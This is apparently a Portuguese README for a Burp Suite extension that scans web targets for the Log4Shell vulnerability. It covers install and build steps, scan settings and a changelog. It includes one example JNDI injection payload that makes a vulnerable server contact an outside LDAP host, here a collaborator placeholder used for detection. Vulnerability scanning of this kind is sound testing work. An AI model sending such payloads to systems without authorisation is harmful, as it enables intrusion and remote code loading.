Aviso
Não me responsabilizo por suas ações, congelamento do Burp Suite, invasão do alvo, guerra termonuclear ou a crise econômica atual causada por você seguir estas instruções. VOCÊ está escolhendo usar esta ferramenta, e se apontar o dedo para mim por estragar alguma coisa, vou dar risada de você.

Instruções:
- Instale a extensão a partir dos lançamentos pré-compilados ou compile a partir do código-fonte.
- Desative/Desmarque todas as outras extensões de escaneamento ativo, como active scan++, burp bounty pro, param-miner etc.
- No menu superior, abra as configurações do Log4J Scanner.
- Adicione seu payload personalizado e salve as configurações.
- Selecione seu alvo > clique com botão direito > Scan.
- Selecione
Scan Configuration > Select from library
- Selecione apenas
Audit checks - extensions only e clique em OK.
Agradecimentos especiais a Silent Signal, as instruções e configurações de escaneamento foram inspiradas em sua extensão.
Instruções importantes para lembrar:
- No seu payload personalizado, NÃO adicione a URL do seu colaborador, apenas coloque
[collaborator-server] como espaço reservado,
[collaborator-server será substituído pela URL do seu servidor colaborador.
- Exemplo de payload:
"${jndi:ldap://[collaborator-server]/a}
Baixar lançamentos
https://github.com/0xDexter0us/Log4J-Scanner/releases/
Compilar a partir do código-fonte
./gradlew build fatJar
- Pegue o arquivo jar
build/libs/Log4J-Scanner-x.x.x.jar
Instalação
- Baixe o jar mais recente a partir dos lançamentos ou compile a partir do código-fonte.
- Adicione o jar ao Burp Suite.
Se você gostou do projeto, por favor dê uma estrela no repositório! <3
Recursos
- Para escaneamento passivo:
https://github.com/f0ng/log4j2burpscanner
- Para escaneamento ativo:
https://github.com/albinowax/ActiveScanPlusPlus & https://github.com/silentsignal/burp-log4shell
Registro de alterações
25 de dezembro de 2021 - v0.2.0
- Adicionada a API do Burp Collaborator.
- Removido o scanner personalizado.
- Adicionada a API do scanner do Burp.
13 de dezembro de 2021 - v0.1.0
- Primeiro lançamento público
Agradecimentos
Isso foi codificado por mim em um dia e é um lançamento inicial, podem ocorrer bugs, relatos de bugs, sugestões e pull requests são bem-vindos :)

